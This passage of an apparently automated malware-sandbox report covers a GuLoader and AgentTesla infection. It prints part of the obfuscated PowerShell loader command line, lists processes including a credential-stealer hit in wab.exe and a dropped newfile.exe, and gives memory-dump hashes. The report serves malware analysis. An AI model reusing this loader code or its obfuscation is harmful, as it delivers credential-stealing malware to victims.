Rust ';$cognitional=$Synkronsvmnings[1]+$cognitional;$Tamarinds116=$Synkronsvmnings[0];Jots (Disken ' ,idi$Detecg erenlVikinoE strbJulusaHstpalPib n:MelamR ArchaSovevds,ckeiVeloko kl.us Fug iSuppogdslernteledaSkraelSysteematrarIndl,sAfsky=Sprac( Ko.mTSpasmeLejevs.ostptSter.-PoculP LuggaRebsltMislah Ress Attra$FrenuT ,nisaAmob,mAksela FradrAff.iiDelegnEn obd Udlas Supe1,yper1Centr6Uns r)Du ll ');while (!$Radiosignalers) {Jots (Disken 'hova $S.inkgElectlBunkeo BrowbVarooaLarynlSnitm:A apeLValraeAnalynFeltndTeknoaSamleb DandlkappeeProla=Letal$ IntotKle krSymfou Cal,eUddel ') ;Jots $cognitional;Jots (Disken 'VintrSSkoletOpkbeaHoughrEkspotCotra-dia.oS Un,elCiseleTilste Aal.p Rend Wali4Overt ');Jots (Disken 'Rekap$DunlegCoadvlReh do BnkhbB,trya Un el.torm:InkosR akaoaTheridApostiCratioUnerosB seji Lse gDyscrnTradua,arumlUnikueBags rKlam.sGesjf=Nonre(Ekv.pTOvenfes,kyss Leopttrykv-Bero.PKrigsa RvestAdvarhFlytt estl$ScripTNonsea,ragtmOwleraHyp rr Mor.i DissnFor.idSk ifs Turi1Stra 1Befol6Uforb)Iniss ') ;Jots (Disken 'Temat$Tilb gPen,olReba.oUneteb NondaDamaslTilre:KlasspFi.uroNominrSlipbt .ndsrTilbrt LogatRecolePretar FrateSp.acrPewee= Post$Over gLu url.mhtto SclebKaktua Hegul Joen:ElektDArgumiSeks,fLiparf Pe,cu charsExt at.uple+Titu,+Brobu%Mine $Foll pSt,olaManeurGa,mmaE docd Tranr.rangoAscocpBe,idp Tel.iHastenresprgSkovm.UnocccvenenoBurkluP.cisnhurrytSt.lk ') ;$Horrify=$paradropping[$portrtterer];}Jots (Disken '.mili$pro.rgsaniklUdtolo nfanbLacquaInddmlKolos: rgaMPressaLsepug Satae Wirir MakraEsk,d1 Udkl1Admin6uncov mache=Grami OverlGI soleboto.t apul- ankeCOve,loEndaon,gnaatThirse,lydinBetegtExplo Si i$ overTLnmodaS eepmOversaNicobrTa,shi AnginStilfdvamsescribb1 Ant.1Sylfe6 Fl,r ');Jots (Disken 'G.lde$Forthg,errelLedeto LipibClaspanoncol,roli:NoninPVognprGleadeMargucIhndeoMultinBothrjForm eUnmodcSta dtPro.euRetnir.andhi Lea,nForcogSugep Svag.=Agraf J.ggl[ D ceS p.odyNolossDuffet Bes e isjomPrewe. 
OperCKldeboAfstenRestavEksemeCorner saurtH men]Ste b:Whett:forfrFBevaerskarnoUdf dmPneumB OrdraH.emtsBaldeeNovel6Elefa4 RapsSKlve,tM.wsarLang iS,ortnCrystgGene.(Smer $TidssM DentaReducgSqu.re NederValfaaBo,ge1.ropo1Veste6 Rejs)Terfe ');Jots (Disken 'Carbo$.eepiggan ilKost oTripobHet raMttetl t,le:Trea.rPassaeOvergbRibbeoBi liuL.vemnSal,ed SobbiTeoren.ammegSk.smnFernaeTvrdrsToldasDo bl Crimb=Manip Affal[ScottSBusteyFulvosrejsetSieseeKabelmSpdbr.BurstT ChokeProgrx Skjotita.i.Br.vbEKoordnvrdilcSlagsopelmadT.knii Ke,nnA.oidgUnimm]Under: Rena:JynxgASemitSSki,dCPashaI LivsI ouch.InputG ,romeFrko tNuzzlS B uit,anatrRestoi Kllen KotegS,erm(Cilio$ Ud oPanasar .vede.ewatcWeedio Am tnSn,bojDioxaeZarenc Bantt gennuForlorElectiD agln PostgToti,)Misav ');Jots (Disken ' Jasm$ForsggDandrlBet.yoRecanbUdgr,aSalutlRural:selskjRefera H.wfmWittebTeh so abrirTopfoeGalletPer mtNedereBelt.nCuber= Lykk$HospirConsueOvertbKedeloDuperuU.salnAadredUdmaniNonadnK.ntogFilmfnTashie SupesSc.nesDissi.NonilsRoseeuUdklabMonchs Sig.tTrinnrWhi.eiPulchnvraisgKunde( Mall3Trimo4Blrek7 tor0Wra p6Telet7Trans,Fo tr2 Boks8go.eb6reapp7opfin3M jor)irri, ');Jots $jamboretten;"
                                                                            Imagebase:0x730000
                                                                            File size:433'152 bytes
                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.2006054606.0000000008700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000004.00000002.1995366811.0000000005BC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.2006759213.000000000B869000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:5
                                                                            Start time:10:12:06
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Klapjagters.Sep && echo $"
                                                                            Imagebase:0x240000
                                                                            File size:236'544 bytes
                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:9
                                                                            Start time:10:12:22
                                                                            Start date:24/04/2024
                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                            Imagebase:0x380000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:10
                                                                            Start time:10:12:40
                                                                            Start date:24/04/2024
                                                                            Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                            Imagebase:0x620000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 0%, ReversingLabs
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                            Target ID:11
                                                                            Start time:10:12:41
                                                                            Start date:24/04/2024
                                                                            Path:C:\Windows\System32\rundll32.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                            Imagebase:0x7ff643820000
                                                                            File size:71'680 bytes
                                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Target ID:12
                                                                            Start time:10:12:48
                                                                            Start date:24/04/2024
                                                                            Path:C:\Users\user\AppData\Roaming\newfile\newfile.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Roaming\newfile\newfile.exe"
                                                                            Imagebase:0x620000
                                                                            File size:516'608 bytes
                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:moderate
                                                                            Has exited:true

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2287538195.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b960000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2286310251.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_7ffd9b890000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: M_^$M_^$M_^$M_^
                                                                              • API String ID: 0-1397233021
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-698613372
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$(f~l$4'tq$4'tq$tPtq$tPtq
                                                                              • API String ID: 0-3317784659
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                              • API String ID: 0-4078996565
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 8N"k$Hxq$h]"k$h]"k$h]"k$$tq$$tq$I"k
                                                                              • API String ID: 0-1354229045
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-3755857650
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$84|l$84|l$tPtq$tPtq$x.ok
                                                                              • API String ID: 0-1386585763
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$4'tq$4'tq$x.ok$x.ok$-ok
                                                                              • API String ID: 0-3284569063
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$$tq$$tq$$tq
                                                                              • API String ID: 0-2409360608
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$x.ok$-ok
                                                                              • API String ID: 0-2365990516
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'tq$4'tq$4'tq$4'tq
                                                                              • API String ID: 0-3196592860
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: 686f135128cf903326980236a7a44e08da687af9e8a334ed4e7a44281eaf32f9
                                                                              • Instruction ID: f2cd6f7ffc6f305d7af1713ded80a70783cdccaae930ff376645819566bf9565
                                                                              • Opcode Fuzzy Hash: 686f135128cf903326980236a7a44e08da687af9e8a334ed4e7a44281eaf32f9
                                                                              • Instruction Fuzzy Hash: 0D3248B4A00205CFEB64CB98C550ED9BBB6FB89314F64C199DA09AF755C732EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: 83c83c77872352e0b9f2dee20d7348a131b6b0a72268100fa468295f85de409a
                                                                              • Instruction ID: ca525987dfaa13cbf284ffa187b775065131027a659ad2cc2519eae2c629ff3c
                                                                              • Opcode Fuzzy Hash: 83c83c77872352e0b9f2dee20d7348a131b6b0a72268100fa468295f85de409a
                                                                              • Instruction Fuzzy Hash: 903249B4A00205CFEB64CB98C550ED9BBB6FB89314F54C199DA09AF755C732EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (f~l$(f~l$(f~l
                                                                              • API String ID: 0-1417331273
                                                                              • Opcode ID: f9f6a89f3400cefb2f3d59ce107467ad47ef988f68912f9e6fe916b1423c6dae
                                                                              • Instruction ID: 3b7e0a6d8ad29d30353542f306a602cf466aefe74b01dc1ea04b6f0e32b1c65d
                                                                              • Opcode Fuzzy Hash: f9f6a89f3400cefb2f3d59ce107467ad47ef988f68912f9e6fe916b1423c6dae
                                                                              • Instruction Fuzzy Hash: E8124CB4A00205CFEB24CB98C550EE9BBB6FB89314F54C199DA09AF755C735EC42CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 84|l$tPtq
                                                                              • API String ID: 0-4134024058
                                                                              • Opcode ID: ff95f6942da8a62dc1f3cd50400d39b9b39d006ae4e8281a024b071c73d36744
                                                                              • Instruction ID: 3e633489212b799eb208d87069368f7447a9b97458d22b5f2febca30c448688b
                                                                              • Opcode Fuzzy Hash: ff95f6942da8a62dc1f3cd50400d39b9b39d006ae4e8281a024b071c73d36744
                                                                              • Instruction Fuzzy Hash: 6231E5B0A05265DFD7318B54C801AAAFBB2EF86310F18819AD9499F653C732C845C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: h]"k$I"k
                                                                              • API String ID: 0-1326065732
                                                                              • Opcode ID: b5c933b29321729b2e7ded3b65386505dbf82d4e2a16940959c8744a757178e7
                                                                              • Instruction ID: 6a4ddd9c4eabf7ea8e58f10ad7fba88ff007aae8b14f9785dfd515eb063882c2
                                                                              • Opcode Fuzzy Hash: b5c933b29321729b2e7ded3b65386505dbf82d4e2a16940959c8744a757178e7
                                                                              • Instruction Fuzzy Hash: EB310630A011188FCB26DB64D8956EEB7F2BF89349F1044EDD909AB351DB35AE85CF81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq
                                                                              • API String ID: 0-2018120210
                                                                              • Opcode ID: 260904b224986e6272eb096368e7ceaeb43d07c82bc4a6b98a4191d5bee895f2
                                                                              • Instruction ID: 4ebe3fdb400ffbbe2420fcee1322aa51a4092d5413815a6e42d14ca629374892
                                                                              • Opcode Fuzzy Hash: 260904b224986e6272eb096368e7ceaeb43d07c82bc4a6b98a4191d5bee895f2
                                                                              • Instruction Fuzzy Hash: 09812BB27042069FEB298B79C8407ABBBB5EFC6310F14846BD559CBA61DB31D841C7A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: x.ok
                                                                              • API String ID: 0-2233070397
                                                                              • Opcode ID: 5b7c69c96a92f432d26269e83f456b0d7d1a799d0e36b59fec697ef851fe870b
                                                                              • Instruction ID: 7a82373e6313ddb7496c6987b0fa829da21bda560be61ea835004c19636dd307
                                                                              • Opcode Fuzzy Hash: 5b7c69c96a92f432d26269e83f456b0d7d1a799d0e36b59fec697ef851fe870b
                                                                              • Instruction Fuzzy Hash: CF3175B4B401049BE7149BA5C965FAF7BA7DF88710F20C068EA016F795CE75AC428BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1999021453.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_73b0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $tq
                                                                              • API String ID: 0-2018120210
                                                                              • Opcode ID: 2707c046ac0c0f9a0c8664d2cbd696d9131be7e40c73c72d274e6005d569844a
                                                                              • Instruction ID: c4b4894aa2c9fe2bafd76f7ba36364cb1b6e10e7d88f3679b07aecaca05e5d18
                                                                              • Opcode Fuzzy Hash: 2707c046ac0c0f9a0c8664d2cbd696d9131be7e40c73c72d274e6005d569844a
                                                                              • Instruction Fuzzy Hash: 7AF049F5704206CBFB38CB04D981BA6F362FBC5218F28C16ADA0C1E965EB32D801CB45
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea63965a743ee6867d460b846a5b5acbeaed40a687ed02be625cd97b712e1774
                                                                              • Instruction ID: 7251b3258dd79f3cfa3f0304c79d13f35e7ae6857ae1da9df1ee0e5daf168d94
                                                                              • Opcode Fuzzy Hash: ea63965a743ee6867d460b846a5b5acbeaed40a687ed02be625cd97b712e1774
                                                                              • Instruction Fuzzy Hash: F6E1E874A00209DFDB15CFA9D584AADFBB2FF49310F258559E809AB355C731ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 909067fb51483cac0b0770182955d59279b390434ee41ee7a60707748f430290
                                                                              • Instruction ID: 4b9e073d6b0c5700a0cc9aa314a3158eb74ba9ad7fcea25b600d133a0b8e9ee4
                                                                              • Opcode Fuzzy Hash: 909067fb51483cac0b0770182955d59279b390434ee41ee7a60707748f430290
                                                                              • Instruction Fuzzy Hash: BDC16931A00208CFCB14DFA5E545AADBBB2FF89314F15856DE406AB365DB74BC89CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8814fb6a819f042624e940208d2ac6bf5c78d0335a338005aa74083b4f8ed42a
                                                                              • Instruction ID: fcba5dbbdc5e18fbdca68acfbf094254dee85663287d42a2d4c466fd702feb62
                                                                              • Opcode Fuzzy Hash: 8814fb6a819f042624e940208d2ac6bf5c78d0335a338005aa74083b4f8ed42a
                                                                              • Instruction Fuzzy Hash: 23D10574A01249AFCB05CFA9D484A9DFBB2FF49314F24C159E809AB361D735ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fc0984ca7f440f9ee758d1d750e346b83158581af7c9c5a5063298b1b5a6ce92
                                                                              • Instruction ID: dc756075613772d5b3a472df28dd059047b5075e09382e174c29c3fedac99e9e
                                                                              • Opcode Fuzzy Hash: fc0984ca7f440f9ee758d1d750e346b83158581af7c9c5a5063298b1b5a6ce92
                                                                              • Instruction Fuzzy Hash: 6CB1F274A00208AFDB15CFA9D484A9DFBB2FF88314F24C159E809AB355D771ED82CB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.1992648998.00000000047C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047C0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_47c0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39f002d964a4fff1f6430c030aaea2bb6547638e7f640c886640fb7a16071a6f
                                                                              • Instruction ID: 8aa805fda75688d6f5d29ce52e81ae8fb4316a0ace3f85a45409ff3aaea8e271
                                                                              • Opcode Fuzzy Hash: 39f002d964a4fff1f6430c030aaea2bb6547638e7f640c886640fb7a16071a6f
